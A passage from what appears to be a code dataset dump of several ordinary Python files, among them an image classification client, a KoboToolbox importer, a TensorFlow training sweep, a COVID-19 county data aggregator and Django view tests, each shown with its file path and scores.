# Send classification request to inference server
response = requests.post(api, files = {"file": open(image_path, 'rb')})
# Obtain prediction result
pred_label_name = response.json()
# Ground Truth
label_name = parse_label(filename)
label = name_to_class_label[label_name]
label_names.append(label_name)
labels.append(label)
# label_name = label_names[idx]
# label = labels[idx]
pred_label_names.append(pred_label_name)
pred_label = name_to_class_label[pred_label_name]
pred_labels.append(pred_label)
# Save classification result
image = render_label(image, label_name, pred_label_name)
cv2.imwrite(os.path.join(result_dir, filename), image)
if pred_label != label:
cv2.imwrite(os.path.join(no_ok_dir, filename), image)
# Estimate performance
print(f'File: {filename}, Label: {label_name}, Pred: {pred_label_name}')
e = time.time()
print(f'Processing time {round(e - s, 2)} (s)')
pred_labels = np.array(pred_labels)
labels = np.array(labels)
bn_confusion_matrix =metrics.confusion_matrix(labels, pred_labels)
bn_report = metrics.classification_report(labels, pred_labels, target_names=bn_class_names, output_dict=True)
save_csv_report(bn_report, os.path.join(output_dir,f'BN_Report.csv'), bn_class_names)
save_csv_confusion_matrix(bn_confusion_matrix, os.path.join(output_dir,f'BN_CM.csv'), bn_class_names)
print(bn_confusion_matrix)
print(bn_report)
end = time.time()
total = end - start
print(f'{round(total / num_samples, 2)} (s), {round(num_samples / total, 2)} (fps)') | client.py | from tkinter.tix import Tree
import requests
import os
import time
import cv2
import numpy as np
from scipy.special import softmax
from sklearn import metrics
import pandas as pd
def parse_labels(filenames):
return [filename[:-4].split('_')[-4][1:-1] for filename in filenames]
def parse_label(filename):
return filename[:-4].split('_')[-4][1:-1]
def render_label(image, label, pred):
image = cv2.putText(image, f'Label: {label}', (50, 100),
cv2.FONT_HERSHEY_SIMPLEX, 1, (255, 0, 0), 2, cv2.LINE_AA)
image = cv2.putText(image, f'Pred: {pred}', (50, 50),
cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 0), 2, cv2.LINE_AA)
cv2.imshow('Classification Result',image)
cv2.waitKey(1)
return image
def save_csv_report(report, output_dir, class_names):
repdf = pd.DataFrame(report).transpose()
repdf.insert(loc=0, column='class', value=class_names + ["accuracy", "macro avg", "weighted avg"])
repdf.to_csv(output_dir, index=False,float_format='%.4f')
def save_csv_confusion_matrix(confusion_matrix, output_dir, class_names):
cm = pd.DataFrame(confusion_matrix, columns=class_names)
cm.insert(loc=0, column=' ', value=class_names)
cm.to_csv(output_dir, index=False)
# API url
api = 'http://10.8.0.94:5000/api/photos/'
class_label_to_name = {0: 'ok', 1: 'qishihuangdong', 2 : 'sipei', 3: 'kongliao', 4: 'wuqishi', 5: 'liewen', 6: 'ruopei'}
name_to_class_label = {'ok': 0 , 'qishihuangdong' : 1, 'sipei' : 1, 'kongliao' : 1, 'wuqishi' : 1, 'liewen' : 1, 'ruopei' : 1}
# name_to_class_label = {'ok': 0 , 'qishihuangdong' : 1, 'sipei' : 2, 'kongliao' : 3, 'wuqishi' : 4, 'liewen' : 5, 'ruopei' : 6}
test_file_path= '/Users/luvletteru/Documents/2022-02-13-Eggs-Test'
output_dir = '/Users/luvletteru/Documents/2022-02-16-Eggs-Test-Result'
result_dir = os.path.join(output_dir, 'results')
no_ok_dir = os.path.join(output_dir, 'no_ok')
bn_class_names = ['OK', 'NoOK']
# bn_class_names = ['好蛋', '气室抖动', '死胚', '空', '无气室', '裂纹', '弱胚']
os.makedirs(result_dir, exist_ok=True)
os.makedirs(no_ok_dir, exist_ok=True)
filenames = os.listdir(test_file_path)
num_samples = len(filenames)
# Parse labels from filenames
# label_names = parse_labels(filenames)
# labels = [name_to_class_label[label_name] for label_name in label_names if label_name in name_to_class_label]
label_names = []
labels = []
pred_label_names = []
pred_labels = []
start = time.time()
for idx, filename in enumerate(filenames):
if '--' in filename:
print(f"Filter {filename}")
continue
s = time.time()
image_path = os.path.join(test_file_path, filename)
image = cv2.imread(image_path)
# Send classification request to inference server
response = requests.post(api, files = {"file": open(image_path, 'rb')})
# Obtain prediction result
pred_label_name = response.json()
# Ground Truth
label_name = parse_label(filename)
label = name_to_class_label[label_name]
label_names.append(label_name)
labels.append(label)
# label_name = label_names[idx]
# label = labels[idx]
pred_label_names.append(pred_label_name)
pred_label = name_to_class_label[pred_label_name]
pred_labels.append(pred_label)
# Save classification result
image = render_label(image, label_name, pred_label_name)
cv2.imwrite(os.path.join(result_dir, filename), image)
if pred_label != label:
cv2.imwrite(os.path.join(no_ok_dir, filename), image)
# Estimate performance
print(f'File: {filename}, Label: {label_name}, Pred: {pred_label_name}')
e = time.time()
print(f'Processing time {round(e - s, 2)} (s)')
pred_labels = np.array(pred_labels)
labels = np.array(labels)
bn_confusion_matrix =metrics.confusion_matrix(labels, pred_labels)
bn_report = metrics.classification_report(labels, pred_labels, target_names=bn_class_names, output_dict=True)
save_csv_report(bn_report, os.path.join(output_dir,f'BN_Report.csv'), bn_class_names)
save_csv_confusion_matrix(bn_confusion_matrix, os.path.join(output_dir,f'BN_CM.csv'), bn_class_names)
print(bn_confusion_matrix)
print(bn_report)
end = time.time()
total = end - start
print(f'{round(total / num_samples, 2)} (s), {round(num_samples / total, 2)} (fps)') | 0.438064 | 0.214136 |
import tempfile, shutil, sys, subprocess, json
import populate_xmeta as px
def kobo_import(kobo_username, auth_token):
kobo_url = "https://kc.kobotoolbox.org/%s" % (kobo_username)
kobo_import_forms(kobo_url, auth_token)
kobo_import_data(auth_token)
def kobo_import_forms(kobo_url, auth_token):
forms = json.loads(subprocess.check_output(["curl", "-X", "GET", "https://kc.kobotoolbox.org/api/v1/forms", "-H", "Authorization: Token %s" % (auth_token)]))
for form in forms:
formid = form['formid']
xlsform = subprocess.check_output(["curl", "-X", "GET", "https://kc.kobotoolbox.org/api/v1/forms/%s/form.xls" % (formid), "-H", "Authorization: Token %s" % (auth_token)])
xform = json.loads(subprocess.check_output(["curl", "-X", "GET", "https://kc.kobotoolbox.org/api/v1/forms/%s/form.json" % (formid), "-H", "Authorization: Token %s" % (auth_token)]))
fid = xform['id_string']
vid = xform['version']
path = formid
xform = json.dumps(xform, sort_keys=True,indent=4, separators=(',', ': '))
px.populate_xmeta_kobo(fid,vid,kobo_url,path,xlsform,xform)
def kobo_import_data(auth_token):
forms = json.loads(subprocess.check_output(["curl", "-X", "GET", "https://kc.kobotoolbox.org/api/v1/forms", "-H", "Authorization: Token %s" % (auth_token)]))
for form in forms:
formid = form['formid']
submissions = json.loads(subprocess.check_output(["curl", "-X", "GET", "https://kc.kobotoolbox.org/api/v1/data/%s" % (formid), "-H", "Authorization: Token %s" % (auth_token)]))
for xdata in submissions:
sid = str(xdata['_id'])
fid = xdata['_xform_id_string']
vid = xdata['__version__']
device_id = "kobo"
device_ip = "kobo"
device_type = "kobo"
xdata = json.dumps(xdata, sort_keys=True,indent=4, separators=(',', ': '))
px.populate_xdata_kobo(sid,fid,vid,device_id,device_ip,device_type,xdata)
if __name__ == '__main__':
if len(sys.argv) == 3:
kobo_import(sys.argv[1],sys.argv[2])
else:
print("Usage: %s kobo username, kobo authorization token" % sys.argv[0]) | kobo_import.py | import tempfile, shutil, sys, subprocess, json
import populate_xmeta as px
def kobo_import(kobo_username, auth_token):
kobo_url = "https://kc.kobotoolbox.org/%s" % (kobo_username)
kobo_import_forms(kobo_url, auth_token)
kobo_import_data(auth_token)
def kobo_import_forms(kobo_url, auth_token):
forms = json.loads(subprocess.check_output(["curl", "-X", "GET", "https://kc.kobotoolbox.org/api/v1/forms", "-H", "Authorization: Token %s" % (auth_token)]))
for form in forms:
formid = form['formid']
xlsform = subprocess.check_output(["curl", "-X", "GET", "https://kc.kobotoolbox.org/api/v1/forms/%s/form.xls" % (formid), "-H", "Authorization: Token %s" % (auth_token)])
xform = json.loads(subprocess.check_output(["curl", "-X", "GET", "https://kc.kobotoolbox.org/api/v1/forms/%s/form.json" % (formid), "-H", "Authorization: Token %s" % (auth_token)]))
fid = xform['id_string']
vid = xform['version']
path = formid
xform = json.dumps(xform, sort_keys=True,indent=4, separators=(',', ': '))
px.populate_xmeta_kobo(fid,vid,kobo_url,path,xlsform,xform)
def kobo_import_data(auth_token):
forms = json.loads(subprocess.check_output(["curl", "-X", "GET", "https://kc.kobotoolbox.org/api/v1/forms", "-H", "Authorization: Token %s" % (auth_token)]))
for form in forms:
formid = form['formid']
submissions = json.loads(subprocess.check_output(["curl", "-X", "GET", "https://kc.kobotoolbox.org/api/v1/data/%s" % (formid), "-H", "Authorization: Token %s" % (auth_token)]))
for xdata in submissions:
sid = str(xdata['_id'])
fid = xdata['_xform_id_string']
vid = xdata['__version__']
device_id = "kobo"
device_ip = "kobo"
device_type = "kobo"
xdata = json.dumps(xdata, sort_keys=True,indent=4, separators=(',', ': '))
px.populate_xdata_kobo(sid,fid,vid,device_id,device_ip,device_type,xdata)
if __name__ == '__main__':
if len(sys.argv) == 3:
kobo_import(sys.argv[1],sys.argv[2])
else:
print("Usage: %s kobo username, kobo authorization token" % sys.argv[0]) | 0.109254 | 0.215392 |
import os
import warnings
os.environ['TF_CPP_MIN_LOG_LEVEL'] = "2"
import tensorflow as tf
import wandb
from wandb.keras import WandbCallback
import sklearn
import numpy as np
from sklearn.metrics import confusion_matrix
from tensorflow.keras.utils import to_categorical
from tensorflow.keras.preprocessing import sequence
from tensorflow.keras import layers, models
from tensorflow.keras.models import Sequential
from tensorflow.keras import layers
from tensorflow.keras import optimizers
from tensorflow.keras.layers import SimpleRNN, Dense
from tensorflow.keras.layers import Bidirectional
from tensorflow.compat.v1 import ConfigProto
from tensorflow.compat.v1 import InteractiveSession
from matplotlib import pyplot
from data_repository import DataRepository
import sys
import tensorflow.keras as K
np.set_printoptions(threshold=sys.maxsize)
# Ignore future warnings
warnings.simplefilter(action='ignore', category=FutureWarning)
# wandb init
wandb.init()
# Root CSV files directory
dirname = wandb.config.path
# Load data and print summary, if desired
repo = DataRepository(dirname)
x_train, x_val, x_test, y_train, y_val, y_test, labels = repo.getForTraining()
num_classes = repo.numClasses
wandb.config.update({'Size_Training_Set': len(x_train),'Size_Validation_Set': len(x_val), 'Size_Test_Set': len(x_test)})
#load tokens
tokens = os.listdir(dirname)
tokens = sorted(tokens, key=str.casefold)
token_labels = {i:tokens[i] for i in range(0, len(tokens))}
# GPU-initialization
physical_devices = tf.config.list_physical_devices('GPU')
print("Num GPUs:", len(physical_devices))
config = ConfigProto()
config.gpu_options.per_process_gpu_memory_fraction = 0.3
config.gpu_options.allow_growth = True
session = InteractiveSession(config=config)
# Model
dropout = wandb.config.dropout
nodesizes = [wandb.config.node_size2, wandb.config.node_size3, wandb.config.node_size4]
model = Sequential()
model.add(Bidirectional(layers.LSTM(wandb.config.node_size1, return_sequences=True), input_shape=(x_train.shape[1], x_train.shape[2])))
model.add(layers.Dropout(rate=dropout))
for i in range(0,wandb.config.num_layers): #number of layers ramdom between 1 an 3
model.add(Bidirectional(layers.LSTM(nodesizes[i],return_sequences=True)))
model.add(layers.Dropout(rate=dropout))
model.add(Bidirectional(layers.LSTM(wandb.config.node_size5)))
model.add(layers.Dropout(rate=dropout))
model.add(layers.Dense(num_classes, activation='softmax'))
model.compile(loss='categorical_crossentropy',
optimizer=wandb.config.optimizer,
metrics=['accuracy',tf.keras.metrics.Precision(),tf.keras.metrics.Recall()])
model.summary()
wandb.config.optimizer_config = model.optimizer.get_config()
history=model.fit(x_train,y_train,
epochs=wandb.config.epochs,
batch_size=wandb.config.batch_size,
validation_data=(x_val,y_val),
shuffle=False,
verbose=2,
callbacks=[WandbCallback()])
model_best_path = os.path.join(wandb.run.dir, "model-best.h5")
#Test accuracy
best_model= tf.keras.models.load_model(filepath=model_best_path)
y_eval = best_model.evaluate(x_test, y_test, verbose=2)
wandb.config.update({'test_loss': y_eval[0],'test_accuracy': y_eval[1], 'test_precision': y_eval[2], 'test_recall': y_eval[3]})
#Confusion Matrix
y_pred = best_model.predict(x_test)
y_pred_integer = np.argmax(y_pred, axis=1)
y_test_integer = np.argmax(y_test, axis=1)
y_pred_name = ([token_labels[p] for p in y_pred_integer])
y_test_name = ([token_labels[p] for p in y_test_integer])
wandb.sklearn.plot_confusion_matrix(y_test_name, y_pred_name)
#Convert to TFLite
tflite_converter = tf.lite.TFLiteConverter.from_keras_model(best_model)
# Needed for some ops.
tflite_converter.experimental_new_converter = True
# tflite_converter.allow_custom_ops = True
tflite_model = tflite_converter.convert()
open(os.path.join(wandb.run.dir, "model-best.tflite"), "wb").write(tflite_model)
os.remove(model_best_path) | lab/sweep.py | import os
import warnings
os.environ['TF_CPP_MIN_LOG_LEVEL'] = "2"
import tensorflow as tf
import wandb
from wandb.keras import WandbCallback
import sklearn
import numpy as np
from sklearn.metrics import confusion_matrix
from tensorflow.keras.utils import to_categorical
from tensorflow.keras.preprocessing import sequence
from tensorflow.keras import layers, models
from tensorflow.keras.models import Sequential
from tensorflow.keras import layers
from tensorflow.keras import optimizers
from tensorflow.keras.layers import SimpleRNN, Dense
from tensorflow.keras.layers import Bidirectional
from tensorflow.compat.v1 import ConfigProto
from tensorflow.compat.v1 import InteractiveSession
from matplotlib import pyplot
from data_repository import DataRepository
import sys
import tensorflow.keras as K
np.set_printoptions(threshold=sys.maxsize)
# Ignore future warnings
warnings.simplefilter(action='ignore', category=FutureWarning)
# wandb init
wandb.init()
# Root CSV files directory
dirname = wandb.config.path
# Load data and print summary, if desired
repo = DataRepository(dirname)
x_train, x_val, x_test, y_train, y_val, y_test, labels = repo.getForTraining()
num_classes = repo.numClasses
wandb.config.update({'Size_Training_Set': len(x_train),'Size_Validation_Set': len(x_val), 'Size_Test_Set': len(x_test)})
#load tokens
tokens = os.listdir(dirname)
tokens = sorted(tokens, key=str.casefold)
token_labels = {i:tokens[i] for i in range(0, len(tokens))}
# GPU-initialization
physical_devices = tf.config.list_physical_devices('GPU')
print("Num GPUs:", len(physical_devices))
config = ConfigProto()
config.gpu_options.per_process_gpu_memory_fraction = 0.3
config.gpu_options.allow_growth = True
session = InteractiveSession(config=config)
# Model
dropout = wandb.config.dropout
nodesizes = [wandb.config.node_size2, wandb.config.node_size3, wandb.config.node_size4]
model = Sequential()
model.add(Bidirectional(layers.LSTM(wandb.config.node_size1, return_sequences=True), input_shape=(x_train.shape[1], x_train.shape[2])))
model.add(layers.Dropout(rate=dropout))
for i in range(0,wandb.config.num_layers): #number of layers ramdom between 1 an 3
model.add(Bidirectional(layers.LSTM(nodesizes[i],return_sequences=True)))
model.add(layers.Dropout(rate=dropout))
model.add(Bidirectional(layers.LSTM(wandb.config.node_size5)))
model.add(layers.Dropout(rate=dropout))
model.add(layers.Dense(num_classes, activation='softmax'))
model.compile(loss='categorical_crossentropy',
optimizer=wandb.config.optimizer,
metrics=['accuracy',tf.keras.metrics.Precision(),tf.keras.metrics.Recall()])
model.summary()
wandb.config.optimizer_config = model.optimizer.get_config()
history=model.fit(x_train,y_train,
epochs=wandb.config.epochs,
batch_size=wandb.config.batch_size,
validation_data=(x_val,y_val),
shuffle=False,
verbose=2,
callbacks=[WandbCallback()])
model_best_path = os.path.join(wandb.run.dir, "model-best.h5")
#Test accuracy
best_model= tf.keras.models.load_model(filepath=model_best_path)
y_eval = best_model.evaluate(x_test, y_test, verbose=2)
wandb.config.update({'test_loss': y_eval[0],'test_accuracy': y_eval[1], 'test_precision': y_eval[2], 'test_recall': y_eval[3]})
#Confusion Matrix
y_pred = best_model.predict(x_test)
y_pred_integer = np.argmax(y_pred, axis=1)
y_test_integer = np.argmax(y_test, axis=1)
y_pred_name = ([token_labels[p] for p in y_pred_integer])
y_test_name = ([token_labels[p] for p in y_test_integer])
wandb.sklearn.plot_confusion_matrix(y_test_name, y_pred_name)
#Convert to TFLite
tflite_converter = tf.lite.TFLiteConverter.from_keras_model(best_model)
# Needed for some ops.
tflite_converter.experimental_new_converter = True
# tflite_converter.allow_custom_ops = True
tflite_model = tflite_converter.convert()
open(os.path.join(wandb.run.dir, "model-best.tflite"), "wb").write(tflite_model)
os.remove(model_best_path) | 0.60778 | 0.337313 |
import json
from datetime import datetime
from typing import Any, Dict, List, cast
from covid19_sfbayarea.utils import dig, parse_datetime
from .cases_by_age import CasesByAge
from .cases_by_ethnicity import CasesByEthnicity
from .cases_by_gender import CasesByGender
from .meta import Meta
from .deaths_by_age import DeathsByAge
from .deaths_by_ethnicity import DeathsByEthnicity
from .deaths_by_gender import DeathsByGender
from .time_series_cases import TimeSeriesCases
from .time_series_tests import TimeSeriesTests
from .total_deaths import TotalDeaths
from ..utils import get_data_model
LANDING_PAGE = 'https://www.smchealth.org/post/san-mateo-county-covid-19-data-1'
def get_county() -> Dict:
out = get_data_model()
out.update(fetch_data())
return out
def fetch_data() -> Dict:
data : Dict = {
'name': 'San Mateo County',
'source_url': LANDING_PAGE,
'meta_from_source': Meta().get_data(),
'meta_from_baypd': """
See power_bi_scraper.py for methods.
San Mateo does not provide a timestamp for their last dataset update,
so BayPD uses midnight of the latest day in the cases timeseries as a proxy.
San Mateo does not provide a deaths timeseries. In lieu of a
timeseries BayPD provides cumulative deaths for the date of the last
dataset update.
""",
'series': {
'cases': TimeSeriesCases().get_data(),
'tests': TimeSeriesTests().get_data()
},
'case_totals': {
'gender': CasesByGender().get_data(),
'age_group': CasesByAge().get_data(),
'race_eth': CasesByEthnicity().get_data()
},
'death_totals': {
'gender': DeathsByGender().get_data(),
'age_group': DeathsByAge().get_data(),
'race_eth': DeathsByEthnicity().get_data()
}
}
last_updated = most_recent_case_time(data)
data.update({ 'update_time': last_updated.isoformat() })
data['series'].update({ 'deaths': cumulative_deaths(last_updated) })
return data
def most_recent_case_time(data: Dict[str, Any]) -> datetime:
most_recent_cases = cast(Dict[str, str], dig(data, ['series', 'cases', -1]))
return parse_datetime(most_recent_cases['date'])
def cumulative_deaths(last_updated: datetime) -> List[Dict[str, Any]]:
# There is no timeseries, but there is a cumulative deaths for the current day.
return [{
'date': last_updated.strftime('%Y-%m-%d'),
'deaths': -1,
'cumul_deaths': TotalDeaths().get_data()
}]
if __name__ == '__main__':
""" When run as a script, prints the data to stdout"""
print(json.dumps(get_county(), indent=4)) | covid19_sfbayarea/data/san_mateo/__init__.py | import json
from datetime import datetime
from typing import Any, Dict, List, cast
from covid19_sfbayarea.utils import dig, parse_datetime
from .cases_by_age import CasesByAge
from .cases_by_ethnicity import CasesByEthnicity
from .cases_by_gender import CasesByGender
from .meta import Meta
from .deaths_by_age import DeathsByAge
from .deaths_by_ethnicity import DeathsByEthnicity
from .deaths_by_gender import DeathsByGender
from .time_series_cases import TimeSeriesCases
from .time_series_tests import TimeSeriesTests
from .total_deaths import TotalDeaths
from ..utils import get_data_model
LANDING_PAGE = 'https://www.smchealth.org/post/san-mateo-county-covid-19-data-1'
def get_county() -> Dict:
out = get_data_model()
out.update(fetch_data())
return out
def fetch_data() -> Dict:
data : Dict = {
'name': 'San Mateo County',
'source_url': LANDING_PAGE,
'meta_from_source': Meta().get_data(),
'meta_from_baypd': """
See power_bi_scraper.py for methods.
San Mateo does not provide a timestamp for their last dataset update,
so BayPD uses midnight of the latest day in the cases timeseries as a proxy.
San Mateo does not provide a deaths timeseries. In lieu of a
timeseries BayPD provides cumulative deaths for the date of the last
dataset update.
""",
'series': {
'cases': TimeSeriesCases().get_data(),
'tests': TimeSeriesTests().get_data()
},
'case_totals': {
'gender': CasesByGender().get_data(),
'age_group': CasesByAge().get_data(),
'race_eth': CasesByEthnicity().get_data()
},
'death_totals': {
'gender': DeathsByGender().get_data(),
'age_group': DeathsByAge().get_data(),
'race_eth': DeathsByEthnicity().get_data()
}
}
last_updated = most_recent_case_time(data)
data.update({ 'update_time': last_updated.isoformat() })
data['series'].update({ 'deaths': cumulative_deaths(last_updated) })
return data
def most_recent_case_time(data: Dict[str, Any]) -> datetime:
most_recent_cases = cast(Dict[str, str], dig(data, ['series', 'cases', -1]))
return parse_datetime(most_recent_cases['date'])
def cumulative_deaths(last_updated: datetime) -> List[Dict[str, Any]]:
# There is no timeseries, but there is a cumulative deaths for the current day.
return [{
'date': last_updated.strftime('%Y-%m-%d'),
'deaths': -1,
'cumul_deaths': TotalDeaths().get_data()
}]
if __name__ == '__main__':
""" When run as a script, prints the data to stdout"""
print(json.dumps(get_county(), indent=4)) | 0.587943 | 0.250191 |
from unittest import mock
from django.test import TestCase
from django.urls import reverse
from dominio.tests.testconf import NoJWTTestCase, NoCacheTestCase
class TestPIPIndicadoresSucesso(NoJWTTestCase, NoCacheTestCase, TestCase):
@mock.patch("dominio.pip.views.PIPIndicadoresDeSucessoDAO.execute")
def test_correct_response(self, _execute):
_execute.return_value = [
("12345", 0.344, "p_finalizacoes"),
("12345", 0.123, "p_resolutividade"),
("12345", 0.983, "p_eludcidacoes"),
]
orgao_id = "12345"
url = reverse("dominio:pip-indicadores-sucesso", args=(orgao_id,))
resp = self.client.get(url)
expected = [
{"orgao_id": 12345, "indice": 0.344, "tipo": "p_finalizacoes"},
{"orgao_id": 12345, "indice": 0.123, "tipo": "p_resolutividade"},
{"orgao_id": 12345, "indice": 0.983, "tipo": "p_eludcidacoes"},
]
assert resp.status_code == 200
assert resp.data == expected
class TestPIPRadarPerformance(NoJWTTestCase, NoCacheTestCase, TestCase):
@mock.patch("dominio.pip.views.PIPRadarPerformanceDAO.get")
def test_correct_response(self, _get_data):
_get_data.return_value = {"data": 1}
url = reverse("dominio:pip-radar-performance", args=("12345",))
resp = self.client.get(url)
assert resp.status_code == 200
assert resp.data == {"data": 1}
class TestPIPPrincipaisInvestigadosView(
NoJWTTestCase, NoCacheTestCase, TestCase):
@mock.patch("dominio.pip.views.PIPPrincipaisInvestigadosDAO.get")
def test_correct_response_get(self, _get_data):
_get_data.return_value = [{"data": 1}]
url = reverse(
"dominio:pip-principais-investigados",
args=("1234", "123")
)
resp = self.client.get(url)
expected_response = {
'investigados': [{"data": 1}], 'nr_paginas': 1
}
_get_data.assert_called_once_with(orgao_id="1234", cpf="123")
assert resp.status_code == 200
assert resp.data == expected_response
@mock.patch("dominio.pip.views.PIPPrincipaisInvestigadosDAO.get")
def test_correct_response_get_search(self, _get_data):
_get_data.return_value = [
{"nm_investigado": "nome1"},
{"nm_investigado": "nome2"}
]
url = reverse(
"dominio:pip-principais-investigados",
args=("1234", "123")
)
data = {"search_string": "nome2"}
resp = self.client.get(url, data)
expected_response = {
'investigados': [{"nm_investigado": "nome2"}],
'nr_paginas': 1
}
_get_data.assert_called_once_with(orgao_id="1234", cpf="123")
assert resp.status_code == 200
assert resp.data == expected_response
@mock.patch("dominio.pip.views.PIPPrincipaisInvestigadosDAO."
"save_hbase_flags")
def test_correct_response_save_flags(self, _save_flags):
_save_flags.return_value = {"data": 1}
url = reverse(
"dominio:pip-principais-investigados",
args=("1234", "123")
)
data = {"representante_dk": "123456", "action": "qualquer"}
resp = self.client.post(url, data)
_save_flags.assert_called_once_with(
"1234", "123", "123456", "qualquer"
)
assert resp.status_code == 200
assert resp.data == {"data": 1}
@mock.patch("dominio.pip.views.PIPPrincipaisInvestigadosDAO."
"save_hbase_flags")
def test_no_personagem_save_flags(self, _save_flags):
_save_flags.return_value = {"data": 1}
url = reverse(
"dominio:pip-principais-investigados",
args=("1234", "123")
)
data = {"action": "qualquer"}
with self.assertRaises(ValueError):
resp = self.client.post(url, data)
_save_flags.assert_not_called()
assert resp.status_code == 200
@mock.patch("dominio.pip.views.PIPPrincipaisInvestigadosDAO."
"save_hbase_flags")
def test_no_action_save_flags(self, _save_flags):
_save_flags.return_value = {"data": 1}
url = reverse(
"dominio:pip-principais-investigados",
args=("1234", "123")
)
data = {"representante_dk": "123456"}
with self.assertRaises(ValueError):
resp = self.client.post(url, data)
_save_flags.assert_not_called()
assert resp.status_code == 200
class TestPIPPrincipaisInvestigadosListaView(
NoJWTTestCase, NoCacheTestCase, TestCase):
@mock.patch("dominio.pip.views."
"PIPPrincipaisInvestigadosPerfilDAO.get_header_info")
@mock.patch("dominio.pip.views.PIPPrincipaisInvestigadosPerfilDAO.get")
@mock.patch("dominio.pip.views.PIPPrincipaisInvestigadosListaDAO.get")
def test_correct_response(self, _get_procedimentos, _get_perfil, _header):
_get_perfil.return_value = [{"data": 1}]
_header.return_value = {"data": 1}
_get_procedimentos.return_value = [{"data": 1}, {"data": 2}]
expected_output = {
"perfil": {"data": 1},
"similares": [{"data": 1}],
"procedimentos": [{"data": 1}, {"data": 2}]
}
url = reverse(
"dominio:pip-principais-investigados-lista",
args=("12345",)
)
resp = self.client.get(url)
_get_perfil.assert_called_once_with(dk=12345, digit=5)
_get_procedimentos.assert_called_once_with(
dk=12345, pess_dk=0, digit=5
)
assert resp.status_code == 200
assert resp.data == expected_output
class TestComparadorRadares(NoJWTTestCase, TestCase):
@mock.patch("dominio.pip.views.PIPComparadorRadaresDAO.execute")
def test_correct_response(self, _execute):
_execute.return_value = [
(
"3456",
"2ª PJ",
"2ª PROMOTORIA",
1.0,
0.0,
None,
0.7,
None
),
(
"6789",
"1ª PJ",
"1ª PROMOTORIA",
1.0,
1.0,
None,
1.0,
None
)
]
url = reverse("dominio:pip-comparador-radares", args=("12345",))
resp = self.client.get(url)
expected_data = [
{
"orgao_id": "3456",
"orgao_codamp": "2ª PJ",
"orgi_nm_orgao": "2ª PROMOTORIA",
"perc_denuncias": 1.0,
"perc_cautelares": 0.0,
"perc_acordos": None,
"perc_arquivamentos": 0.7,
"perc_aberturas_vista": None
},
{
"orgao_id": "6789",
"orgao_codamp": "1ª PJ",
"orgi_nm_orgao": "1ª PROMOTORIA",
"perc_denuncias": 1.0,
"perc_cautelares": 1.0,
"perc_acordos": None,
"perc_arquivamentos": 1.0,
"perc_aberturas_vista": None
}
]
self.assertEqual(resp.status_code, 200)
self.assertEqual(resp.data, expected_data) | dominio/pip/tests/test_views.py | from unittest import mock
from django.test import TestCase
from django.urls import reverse
from dominio.tests.testconf import NoJWTTestCase, NoCacheTestCase
class TestPIPIndicadoresSucesso(NoJWTTestCase, NoCacheTestCase, TestCase):
@mock.patch("dominio.pip.views.PIPIndicadoresDeSucessoDAO.execute")
def test_correct_response(self, _execute):
_execute.return_value = [
("12345", 0.344, "p_finalizacoes"),
("12345", 0.123, "p_resolutividade"),
("12345", 0.983, "p_eludcidacoes"),
]
orgao_id = "12345"
url = reverse("dominio:pip-indicadores-sucesso", args=(orgao_id,))
resp = self.client.get(url)
expected = [
{"orgao_id": 12345, "indice": 0.344, "tipo": "p_finalizacoes"},
{"orgao_id": 12345, "indice": 0.123, "tipo": "p_resolutividade"},
{"orgao_id": 12345, "indice": 0.983, "tipo": "p_eludcidacoes"},
]
assert resp.status_code == 200
assert resp.data == expected
class TestPIPRadarPerformance(NoJWTTestCase, NoCacheTestCase, TestCase):
@mock.patch("dominio.pip.views.PIPRadarPerformanceDAO.get")
def test_correct_response(self, _get_data):
_get_data.return_value = {"data": 1}
url = reverse("dominio:pip-radar-performance", args=("12345",))
resp = self.client.get(url)
assert resp.status_code == 200
assert resp.data == {"data": 1}
class TestPIPPrincipaisInvestigadosView(
NoJWTTestCase, NoCacheTestCase, TestCase):
@mock.patch("dominio.pip.views.PIPPrincipaisInvestigadosDAO.get")
def test_correct_response_get(self, _get_data):
_get_data.return_value = [{"data": 1}]
url = reverse(
"dominio:pip-principais-investigados",
args=("1234", "123")
)
resp = self.client.get(url)
expected_response = {
'investigados': [{"data": 1}], 'nr_paginas': 1
}
_get_data.assert_called_once_with(orgao_id="1234", cpf="123")
assert resp.status_code == 200
assert resp.data == expected_response
@mock.patch("dominio.pip.views.PIPPrincipaisInvestigadosDAO.get")
def test_correct_response_get_search(self, _get_data):
_get_data.return_value = [
{"nm_investigado": "nome1"},
{"nm_investigado": "nome2"}
]
url = reverse(
"dominio:pip-principais-investigados",
args=("1234", "123")
)
data = {"search_string": "nome2"}
resp = self.client.get(url, data)
expected_response = {
'investigados': [{"nm_investigado": "nome2"}],
'nr_paginas': 1
}
_get_data.assert_called_once_with(orgao_id="1234", cpf="123")
assert resp.status_code == 200
assert resp.data == expected_response
@mock.patch("dominio.pip.views.PIPPrincipaisInvestigadosDAO."
"save_hbase_flags")
def test_correct_response_save_flags(self, _save_flags):
_save_flags.return_value = {"data": 1}
url = reverse(
"dominio:pip-principais-investigados",
args=("1234", "123")
)
data = {"representante_dk": "123456", "action": "qualquer"}
resp = self.client.post(url, data)
_save_flags.assert_called_once_with(
"1234", "123", "123456", "qualquer"
)
assert resp.status_code == 200
assert resp.data == {"data": 1}
@mock.patch("dominio.pip.views.PIPPrincipaisInvestigadosDAO."
"save_hbase_flags")
def test_no_personagem_save_flags(self, _save_flags):
_save_flags.return_value = {"data": 1}
url = reverse(
"dominio:pip-principais-investigados",
args=("1234", "123")
)
data = {"action": "qualquer"}
with self.assertRaises(ValueError):
resp = self.client.post(url, data)
_save_flags.assert_not_called()
assert resp.status_code == 200
@mock.patch("dominio.pip.views.PIPPrincipaisInvestigadosDAO."
"save_hbase_flags")
def test_no_action_save_flags(self, _save_flags):
_save_flags.return_value = {"data": 1}
url = reverse(
"dominio:pip-principais-investigados",
args=("1234", "123")
)
data = {"representante_dk": "123456"}
with self.assertRaises(ValueError):
resp = self.client.post(url, data)
_save_flags.assert_not_called()
assert resp.status_code == 200
class TestPIPPrincipaisInvestigadosListaView(
NoJWTTestCase, NoCacheTestCase, TestCase):
@mock.patch("dominio.pip.views."
"PIPPrincipaisInvestigadosPerfilDAO.get_header_info")
@mock.patch("dominio.pip.views.PIPPrincipaisInvestigadosPerfilDAO.get")
@mock.patch("dominio.pip.views.PIPPrincipaisInvestigadosListaDAO.get")
def test_correct_response(self, _get_procedimentos, _get_perfil, _header):
_get_perfil.return_value = [{"data": 1}]
_header.return_value = {"data": 1}
_get_procedimentos.return_value = [{"data": 1}, {"data": 2}]
expected_output = {
"perfil": {"data": 1},
"similares": [{"data": 1}],
